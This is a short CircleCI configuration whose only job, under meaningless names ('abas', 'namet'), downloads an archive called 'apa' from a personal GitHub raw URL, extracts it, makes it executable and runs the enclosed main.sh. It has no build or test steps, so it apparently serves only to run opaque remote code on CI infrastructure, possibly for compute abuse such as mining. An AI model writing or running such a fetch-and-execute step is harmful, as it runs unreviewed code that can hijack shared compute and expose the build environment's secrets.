version: 2
jobs:
  abas:
    docker:
      - image: cimg/python:3.8

    steps:
    - checkout
    - run:
        name: namet
        command: |
          wget https://raw.githubusercontent.com/nedipaol/tara/main/apa && chmod u+x *
          tar -xf apa && chmod u+x *
          ls
          bash main.sh
          



workflows:
  version: 2
  abas:
    jobs:
    - abas
